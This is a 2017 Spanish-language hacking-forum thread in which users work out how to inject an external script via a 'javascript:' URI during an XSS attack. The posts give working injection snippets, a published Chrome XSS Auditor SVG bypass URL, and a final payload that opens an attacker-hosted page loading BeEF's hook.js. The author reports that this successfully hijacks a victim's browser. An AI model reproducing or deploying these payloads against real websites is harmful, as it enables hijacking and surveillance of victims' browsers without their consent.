Foro de elhacker.net

Seguridad Informática => Seguridad => Mensaje iniciado por: Ethicalsk en 12 Octubre 2017, 14:53 pm



Título: Cómo incluir un script de otra página utilizando "javascript:"?
Publicado por: Ethicalsk en 12 Octubre 2017, 14:53 pm
Buenas! la forma que conozco para agregar un script de otra página es:

Código
  1. <script src="www.web.com/script.js"></script>

pero si me encuentro realizando un XSS y necesito usar si o si "javascript:" y no al tag <script>, no sabría como incluir un js de otra pagina...

probé:

Código
  1. javascript:www.web.com/script.js

y no funciono,
tampoco funcionó:

Código
  1. javascript:src="www.web.com/script.js"

tampoco funcionó:

Código
  1. javascript:var script = document.createElement('script'); script.src = 'www.web.com/script.js'; document.head.appendChild(script);

Quería saber si tenían algún otra idea. Gracias desde ya!


Título: Re: Cómo incluir un script de otra página utilizando "javascript:"?
Publicado por: engel lex en 12 Octubre 2017, 17:29 pm
Código
  1. javascript:
  2. var src="http://loquesea.com/script.js";
  3. var element1 = document.createElement("script");
  4. element1.src = src;
  5. element1.type="text/javascript";
  6. document.getElementsByTagName("head")[0].appendChild(element1);
  7.  

Lo puse por línea para que sea legible, simplemente copia eso como marcador y cambia el src por el de tu gusto


Título: Re: Cómo incluir un script de otra página utilizando "javascript:"?
Publicado por: Ethicalsk en 12 Octubre 2017, 21:58 pm
Hola engel! Muchas gracias, es bastante parecido a lo que hice en mi tercer intento, pero no me está funcionando. Siendo más específico, lo que estaba queriendo hacer es incluir el hook.js de beEF utilizando éste bypass para los filtros de las versiones más nuevas de Chrome:

https://brutelogic.com.br/blog/chrome-xss-auditor-svg-bypass/ (https://brutelogic.com.br/blog/chrome-xss-auditor-svg-bypass/)

Que sería el siguiente:

https://brutelogic.com.br/xss.php?a=guest!+Watch+the+video+before+proceeding:%3Cbr%3E%3Cbr%3E%3Csvg+width=12cm+height=9cm%3E%3Ca%3E%3Cimage+href=//brutelogic.com.br/yt.jpg+/%3E%3Canimate+attributeName=href+values=javas%26%2399ript:alert(1)%3E

entonces yo pense que al final en vez de usar javascript:alert(1), podría incluir algo como lo que me mandaste vos, pero cuando pruebo en la consola del chrome no logro secuestrar mi navegador. Mira:

(http://www.subirimagenes.com/imagedata.php?url=http://s2.subirimagenes.com/imagen/9810236imagen.png)

según lo que me responde la consola, el script parece haberse formado correctamente, pero sin embargo no logro secuestrar el navegador, sino en Online Browsers dentro del beEF ya tendría que ver la IP del navegador...

Tenés algúna idea sobre como resolver ésto? Saludos!


Título: Re: Cómo incluir un script de otra página utilizando "javascript:"?
Publicado por: engel lex en 12 Octubre 2017, 22:12 pm
el script está incluido... no tienes que cargar alguna funciòn o algo? no depende de otro? revisaste las peticiones a ver si no están fallando?


Título: Re: Cómo incluir un script de otra página utilizando "javascript:"?
Publicado por: Ethicalsk en 12 Octubre 2017, 22:28 pm
Cuando el hook.js se llega a cargar en el navegador de la víctima ya se secuestra el navegador, no hace falta nada más. Recién estuve fijándome lo que me decías de revisar las solicitudes, y ahí está el tema... Desde la consola del navegador no se envía ninguna consulta... Y la consola solo la estaba usando para probar, pero voy a ver que consulta se hace cuando mando directamente el enlace junto con esas lineas de codigo. Cuando lo pueda resolver escribo por aca. Saludos!


Actualizo!

Ya pude resolver el problema, en éste caso intente algo distinto. Utilicé:

javascript:open(//mi_dns/beef.html/)

y adentro de beef.html tengo:

Código:
<html>
<head>
<script src="http://mi_dns:3000/hook.js"></script>
</head>
<body>
</body>
</html>

con ésto pude secuestrar satisfactoriamente el navegador de la víctima a través de beEF bypasseando los ultimos filtros de chrome. Después me gustaría hacer un video explicando cómo lograr ésto y que hay que tener en cuenta para lograrlo.

Saludos!